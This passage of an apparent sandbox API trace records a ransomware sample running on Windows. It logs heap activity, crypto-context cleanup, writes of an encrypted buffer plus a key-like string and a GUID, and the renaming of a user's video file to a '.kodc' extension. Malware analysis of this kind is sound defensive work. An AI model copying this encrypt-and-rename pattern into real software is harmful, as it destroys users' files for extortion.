pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.682] GetLastError () returned 0x0 [0100.682] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.682] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0100.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.682] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.682] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.682] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8650) returned 0x9ba8d90 [0100.682] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb58f0 [0100.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7da0 [0100.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5938 [0100.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7db8 [0100.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7de8 [0100.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e00 [0100.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.683] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.683] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7de8 | out: hHeap=0x630000) returned 1 [0100.683] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e00 | out: hHeap=0x630000) returned 1 [0100.683] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.683] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.683] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0100.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7e00 [0100.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0100.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7de8 [0100.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0100.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0100.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0100.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.683] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e00 | out: hHeap=0x630000) returned 1 [0100.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7de8 | out: hHeap=0x630000) returned 1 [0100.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.684] GetCurrentThreadId () returned 0x42c [0100.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba7348 [0100.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.684] GetCurrentThreadId () returned 0x42c [0100.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7de8 [0100.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0100.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e00 [0100.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7dd0 [0100.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7e18 [0100.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a40 [0100.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0100.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7de8 | out: hHeap=0x630000) returned 1 [0100.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7de8 [0100.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0100.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0100.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0100.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0100.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0100.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7de8 | out: hHeap=0x630000) returned 1 [0100.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0100.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0100.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0100.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0100.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0100.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e18 | out: hHeap=0x630000) returned 1 [0100.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e00 | out: hHeap=0x630000) returned 1 [0100.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7dd0 | out: hHeap=0x630000) returned 1 [0100.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0100.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0100.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7db8 | out: hHeap=0x630000) returned 1 [0100.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb5938 | out: hHeap=0x630000) returned 1 [0100.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0100.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0100.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0100.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0100.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0100.689] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba8d90*, nNumberOfBytesToWrite=0x864f, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba8d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x864f, lpOverlapped=0x0) returned 1 [0100.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba8d90 | out: hHeap=0x630000) returned 1 [0100.689] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8654, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.689] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0100.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0100.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0100.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0100.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0100.690] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0100.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.690] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.690] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.690] CloseHandle (hObject=0x5cc) returned 1 [0100.692] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.692] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0100.692] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0100.692] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_qZtKPa8t1aDT4M.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_qztkpa8t1adt4m.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_qZtKPa8t1aDT4M.mp4.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_qztkpa8t1adt4m.mp4.kodc")) returned 1 [0100.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0100.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.693] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0100.694] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17276450, ftCreationTime.dwHighDateTime=0x1d5c2be, ftLastAccessTime.dwLowDateTime=0xd6e17740, ftLastAccessTime.dwHighDateTime=0x1d5c309, ftLastWriteTime.dwLowDateTime=0xd6e17740, ftLastWriteTime.dwHighDateTime=0x1d5c309, nFileSizeHigh=0x0, nFileSizeLow=0x8654, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_qZtKPa8t1aDT4M.mp4", cAlternateFileName="_QZTKP~1.MP4")) returned 0 [0100.695] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0100.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0100.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0100.695] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0100.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0100.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce680 | out: hHeap=0x630000) returned 1 [0100.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318298 | out: hHeap=0x630000) returned 1 [0100.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318d40 | out: hHeap=0x630000) returned 1 [0100.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33185b0 | out: hHeap=0x630000) returned 1 [0100.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce6e8 | out: hHeap=0x630000) returned 1 [0100.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce340 | out: hHeap=0x630000) returned 1 [0100.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce478 | out: hHeap=0x630000) returned 1 [0100.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318be0 | out: hHeap=0x630000) returned 1 [0100.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0100.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9aac8 | out: hHeap=0x630000) returned 1 [0100.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce4e0 | out: hHeap=0x630000) returned 1 [0100.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9ab20 | out: hHeap=0x630000) returned 1 [0100.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9ab78 | out: hHeap=0x630000) returned 1 [0100.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce1a0 | out: hHeap=0x630000) returned 1 [0100.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9abd0 | out: hHeap=0x630000) returned 1 [0100.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce270 | out: hHeap=0x630000) returned 1 [0100.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9ac28 | out: hHeap=0x630000) returned 1 [0100.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9ac80 | out: hHeap=0x630000) returned 1 [0100.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0100.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0100.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0100.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0100.696] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0100.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.697] HeapFree (in: hHeap=0x630000, 